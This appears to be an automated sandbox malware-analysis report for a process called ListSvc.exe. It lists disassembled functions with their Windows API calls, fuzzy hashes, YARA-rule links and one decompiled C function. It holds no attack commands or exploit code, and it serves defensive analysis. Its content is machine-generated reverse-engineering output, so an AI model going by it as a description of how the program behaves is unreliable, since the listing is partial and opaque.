Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
Instruction ID: 299b27e64c01e87a133ce8a54c99347aef86e5c58dac0e1e1101b5cceb09c5b5
Opcode Fuzzy Hash: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
Instruction Fuzzy Hash: 09F0ECA160511166CB60BBB65C8787F5A8C9FC43907751D2BF841DA192D514CC8142FE

Uniqueness

Uniqueness Score: -1.00%

Function 006A5D88, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008), ref: 006A5D91
OpenProcessToken.ADVAPI32(00000000,00000008), ref: 006A5D97
GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008), ref: 006A5DB9
CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008), ref: 006A5DCA

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
Instruction ID: 606920211f29873d44d72264013709cf63daaae85b794eef22724c21b877f5a5
Opcode Fuzzy Hash: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
Instruction Fuzzy Hash: 30F030716043017BD700EAB58D82EDB77DCAF45715F00482DBA98C7281DA38ED489766

Uniqueness

Uniqueness Score: -1.00%

Function 004F5548, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004F5551
SelectObject.GDI32(00000000,058A00B4), ref: 004F5563
GetTextMetricsW.GDI32(00000000,?,00000000,058A00B4,00000000), ref: 004F556E
ReleaseDC.USER32 ref: 004F557F

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: MetricsObjectReleaseSelectText
String ID:
API String ID: 2013942131-0
Opcode ID: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
Instruction ID: eb0f3ac5e6ff13c2d338f041733c2278b611cd6d279531a3f0c2a93b6799ed89
Opcode Fuzzy Hash: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
Instruction Fuzzy Hash: 64E0DF71E029A432D61071661C82BEF2A498F823AAF08112BFF08992D1DA0CC94083FE

Uniqueness

Uniqueness Score: -1.00%

Function 006B72C2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 006B7302

Strings

@, xrefs: 006B72C8
/INITPROCWND=$%x , xrefs: 006B7332

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Window
String ID: /INITPROCWND=$%x $@
API String ID: 2353593579-4169826103
Opcode ID: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
Instruction ID: aee196482ecc750f80196a5b85e8ce4b28bd470815894a77b79cec9963f5eee4
Opcode Fuzzy Hash: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
Instruction Fuzzy Hash: 0721C070A083489FDB01EBA4D841FEE77F6EF89304F51447AF800E7291DA38AA45DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00435608, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(FYC), ref: 00435618

Part of subcall function 0040A61C: SysReAllocStringLen.OLEAUT32(00000000,?,?), ref: 0040A636

Strings

kYC, xrefs: 00435656
FYC, xrefs: 00435614, 00435638, 0043566B, 00435617, 0043563B

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: AllocInitStringVariant
String ID: FYC$kYC
API String ID: 4010818693-1629163012
Opcode ID: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
Instruction ID: 78d3457c21f8c6ae710edabf1b7f51a26e4fb704544ac86c5ed1d2f79e361521
Opcode Fuzzy Hash: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
Instruction Fuzzy Hash: 2FF08171704608AFD700EB95CC52E9EB3F8EB4D700FA04176F604E3690DA346E04C769

Uniqueness

Uniqueness Score: -1.00%

Function 006B8CAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 006ACE20: FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36

Part of subcall function 006ACB10: GetTickCount.KERNEL32 ref: 006ACB58

Part of subcall function 00615560: SendMessageW.USER32(00000000,00000B01,00000000,00000000), ref: 0061557F

GetCurrentProcess.KERNEL32(00000001,?,?,?,?,006B97CB), ref: 006B8D01
TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,006B97CB), ref: 006B8D07

Strings

Detected restart. Removing temporary directory., xrefs: 006B8CBB

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
String ID: Detected restart. Removing temporary directory.
API String ID: 1717587489-3199836293
Opcode ID: b875f7f0b48f5dfd19b2ce76acc2faf3568150e367b49ea09eed803ae0a996fc
Instruction ID: 85aea6856e01ecd59818c985a9c9c54c6fb1bec533a363d5825b66760217dfd7
Opcode Fuzzy Hash: b875f7f0b48f5dfd19b2ce76acc2faf3568150e367b49ea09eed803ae0a996fc
Instruction Fuzzy Hash: 38E0E5F16082446EE2417BB9FC13DA67F9FDB86764B51043BF50083542D9295C80C338

Uniqueness

Uniqueness Score: -1.00%

Function 005C86E0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C86FA

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

Part of subcall function 005C8644: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B

Strings

user32.dll, xrefs: 005C86F5
ChangeWindowMessageFilterEx, xrefs: 005C86F0

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: ChangeWindowMessageFilterEx$user32.dll
API String ID: 1883125708-2676053874
Opcode ID: 7df53831068b11b3bc6f85ec8e00ebaae734f643accca07e7ade5c95f0b28fc3
Instruction ID: 33574298acf09a9ab3b8dc906f6acd80ea038e69245e9512450f7745a5549cab
Opcode Fuzzy Hash: 7df53831068b11b3bc6f85ec8e00ebaae734f643accca07e7ade5c95f0b28fc3
Instruction Fuzzy Hash: F7F0A070702610DFD715EBA9AC89F662FE6EB84345F30142EF1069B691DBB60880C699

Uniqueness

Uniqueness Score: -1.00%

Function 005C8790, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Part of subcall function 005C8820: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E

GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019,?,00000000,006B80E6), ref: 005C87A8

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

Strings

user32.dll, xrefs: 005C87A3
ShutdownBlockReasonCreate, xrefs: 005C879E

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: ShutdownBlockReasonCreate$user32.dll
API String ID: 1883125708-2866557904
Opcode ID: 2aa4c1ecb0c25f1be1c5e6900995ae7394209ee48eb3cc3556ffc74fd539a6e1
Instruction ID: 7110eff28424d8e01fad9884693b7150e68d4fec514983f83c6ed3211673b8d3
Opcode Fuzzy Hash: 2aa4c1ecb0c25f1be1c5e6900995ae7394209ee48eb3cc3556ffc74fd539a6e1
Instruction Fuzzy Hash: E7E0C2623402212E020071FF2C85F7F08CCEDC8B6A3300C3EB200D3501EE5ACC0101AC

Uniqueness

Uniqueness Score: -1.00%

Function 005C7488, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,0060D678,00000000,0060D74A,?,?,006D579C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C74A2

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

Strings

GetSystemWow64DirectoryW, xrefs: 005C7498
kernel32.dll, xrefs: 005C749D

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 1646373207-1816364905
Opcode ID: 4c32a65a860ad497678a8e71e86e44d9654e19785abb72717ae8a0dce5466f25
Instruction ID: e1b2a1fbaeccbf4b8658dcbc551e8be6aafa7850fd628b76cf9cecd9236f8401
Opcode Fuzzy Hash: 4c32a65a860ad497678a8e71e86e44d9654e19785abb72717ae8a0dce5466f25
Instruction Fuzzy Hash: 95E0DFB07047051BDF1061FA8CC3F9A1D896BDC794F20483E3A90D66C2F9ACD9400AAA

Uniqueness

Uniqueness Score: -1.00%

Function 005C8644, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

Strings

user32.dll, xrefs: 005C8656
ChangeWindowMessageFilter, xrefs: 005C8651

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ChangeWindowMessageFilter$user32.dll
API String ID: 1646373207-2498399450
Opcode ID: d5c5c43d7ea52c44e9976db0544a7561c6df8b4dd84608384c188d363e3b4acb
Instruction ID: f5cb7bf2fd8e9c4876a78839223762f9bc4b5f6247b358773db5c5b1cf956787
Opcode Fuzzy Hash: d5c5c43d7ea52c44e9976db0544a7561c6df8b4dd84608384c188d363e3b4acb
Instruction Fuzzy Hash: 4CE01AB4A01701DED711ABA6AC49FE93BEEE798305F20641EB246D6695CBB904C0CF94

Uniqueness

Uniqueness Score: -1.00%

Function 005C8820, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

Strings

user32.dll, xrefs: 005C8829
ShutdownBlockReasonDestroy, xrefs: 005C8824

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ShutdownBlockReasonDestroy$user32.dll
API String ID: 1646373207-260599015
Opcode ID: 8427ef742386233abb3eb781771c12357b31464d3db843b592f5d6180d91b402
Instruction ID: f0c74795214b74e90bc607b5066537e4d8d40fa8e1211c6ca3dcb32fdea7855f
Opcode Fuzzy Hash: 8427ef742386233abb3eb781771c12357b31464d3db843b592f5d6180d91b402
Instruction Fuzzy Hash: 22D0C7B37117222A651075FA3CE1FF70A8CDD95795354087EF700E2941DD55DC4111A8

Uniqueness

Uniqueness Score: -1.00%

Function 006B9800, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

Strings

DisableProcessWindowsGhosting, xrefs: 006B9800
user32.dll, xrefs: 006B9805

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: DisableProcessWindowsGhosting$user32.dll
API String ID: 1646373207-834958232
Opcode ID: 93f995bdab4b473a61fd02318e1a2b49a3f24fe148fe8aefdfb1ddf0f8e4a138
Instruction ID: a737f6cb342469133653c2ad22e7ce718afd724c013acdac2058dbbd1ad6bbf7
Opcode Fuzzy Hash: 93f995bdab4b473a61fd02318e1a2b49a3f24fe148fe8aefdfb1ddf0f8e4a138
Instruction Fuzzy Hash: 99B092F0240331101C1072B33C02ACA080A08CBB497024C2A3720A108ADD4880C01239

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ListSvc.exe PID: 6348 Parent PID: 6296 ListSvc.exeCOMMON

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	837
Total number of Limit Nodes:	31

Executed Functions

Function 0040B044, Relevance: 3.1, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040B044(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
				char _v8;
				short _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _t29;
				void* _t40;
				intOrPtr* _t44;
				intOrPtr _t55;
				void* _t61;

				_push(__ebx);
				_v24 = 0;
				_v20 = 0;
				_t44 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t61);
				_push(0x40b104);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xffffffec;
				_t21 =  &_v16;
				L00403730();
				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
				E0040858C( &_v20, 4,  &_v16);
				E0040873C(_t44, _v20, _v8);
				_t29 = E0040AEF4( *_t44, _t44); // executed
				if(_t29 == 0) {
					_v12 = 0;
					E0040858C( &_v24, 4,  &_v16);
					E0040873C(_t44, _v24, _v8);
					_t40 = E0040AEF4( *_t44, _t44); // executed
					if(_t40 == 0) {
						E00407A20(_t44);
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E0040B10B);
				E00407A80( &_v24, 2);
				return E00407A20( &_v8);
			}

APIs

GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B076
GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B07F

Part of subcall function 0040AEF4: FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
Part of subcall function 0040AEF4: FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37

Memory Dump Source

